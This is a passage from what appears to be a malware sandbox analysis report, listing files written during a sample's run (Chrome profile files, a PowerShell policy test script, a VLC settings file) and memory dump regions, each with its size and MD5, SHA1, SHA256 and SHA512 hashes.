4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
9887aea604f21e2700cb911e6c6dd971

SHA1
f9b76d2dbbc417e1f0efb37de3411a96051ed24c

SHA256
112a94353b6301ce83cce31d7527d9b919d002093ae9c51dc9abd2bbe7909e5e

SHA512
f444821b8113b6dcf3ab890c7200331bc7c677b6aafa08e04f410aae0782fd6fa4740ad455b2e7b506612b42353512f695d54ec9fe4bbb7fd8d555e7339d6f80

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
ef3805103460376bb051aa0868fd1e05

SHA1
3385f432c38fa6d5a22ec47195345854e1cb07ac

SHA256
f1877b0ef425ad1230ec54394245d597d049081c8d5cb48880b5d1344f1026ab

SHA512
c748fc3dc706fe975623d4199873e9f645429d56a4b9d25a5fbec85fbc03cf066269fbf849c350bae22a07d2c742cd3bf4b8b6d0baa86736859d98dec3d90c5b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
5c4683ef21c7e9adfe626a7396af10cd

SHA1
ae0a7ed6600ef2cc7e052540b02201a7b00eb347

SHA256
3930ad327dc0f39fa6ce29b8b8c07a337bc2c798e4bfa805c5a548a14423805f

SHA512
81eb6d22a03af04b018509c82909e9c93323b0c060893f81fa15abe114d254a86f7558e9c31e0b42dc6ff2cee23181efc7bf26828bd2896ef6613cc5eb81ad2c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
208KB

MD5
72b7db49d65425a4f5c585455241bf9c

SHA1
36aa9c12f15d8624fb90e01fd16bd53ad92fc74d

SHA256
4006d958ab9a0bbebe0d0ba40bf0a2445c094b7c4bb2766f4b98e8f2d4161455

SHA512
77c4a0673b5ea0db376e07ca32ce92d86644570454bfaf210e9ee71038a96241267abd10d006b409524aa8bb3e1e365d4937a7306da5e72937e725cef34a233d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
06f54da138064bcb87a50ea5796be0bc

SHA1
149614dcc0cc8a15d12e042639d53d364b692f5a

SHA256
fd00cc98658581a6d166ce94e14f68079c4a2948db69e5ac60755ac8c50c1f50

SHA512
530073a003f19a93945cc2d663cd395744c98b3d8377ed6fbc237be0b42b7ec23544fe149435e3d5d47b8d385c2a9bd1e2605222bbe2df0d3233edf10550202d

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
2464a58269a134f2979060e336390b5c

SHA1
31d3185eb35ec0ccc4ad52f5cf0e278183315dbd

SHA256
554d683b35a8120871871ef5733e307f50400a424889bc1caf8b4375fd3bfc00

SHA512
9d93b63d2e7d55fe88bf6023db7f2c4581ebd9b03e2a17abe39b381eee19ca71e5f2bf85f19b022afe06936d2089ef1c5eeee0607ac3f8d1e1657560afb8666d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i13j0mrs.j2o.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\vlc\vlc-qt-interface.ini

Filesize
79B

MD5
b4cd2788482c4dd08fb66167885731e6

SHA1
5cb3b4384c0804c2fd5ba1deb3723a782c60d30b

SHA256
f25d7e31cb47b23c04cf2a9c8387e34abe18e4b0468f0021f9657ba27e31b5df

SHA512
f57cb2f379067b9d779b1e296c2675b020cb4dae00b6cb86345d62f18825c875421a1109473ac0168b0b42ca41f74fcfa93f65a53f97f0967404339f83e275b4

Download Submit
memory/1156-488-0x00007FFCD4CB0000-0x00007FFCD5D60000-memory.dmp

Filesize
16.7MB

Download
memory/1156-487-0x00007FFCE7890000-0x00007FFCE7B46000-memory.dmp

Filesize
2.7MB

Download
memory/1156-486-0x00007FFCE8230000-0x00007FFCE8264000-memory.dmp

Filesize
208KB

Download
memory/1156-485-0x00007FF6AFF00000-0x00007FF6AFFF8000-memory.dmp

Filesize
992KB

Download
memory/2168-0-0x00007FFCD5143000-0x00007FFCD5145000-memory.dmp

Filesize
8KB

Download
memory/2168-15-0x00007FFCD5140000-0x00007FFCD5C02000-memory.dmp

Filesize
10.8MB

Download
memory/2168-12-0x00007FFCD5140000-0x00007FFCD5C02000-memory.dmp

Filesize
10.8MB

Download
memory/2168-11-0x00007FFCD5140000-0x00007FFCD5C02000-memory.dmp

Filesize
10.8MB

Download
memory/2168-10-0x00007FFCD5140000-0x00007FFCD5C02000-memory.dmp

Filesize
10.8MB

Download
memory/2168-1-0x0000022BEA5C0000-0x0000022BEA5E2000-memory.dmp

Filesize
136KB

Download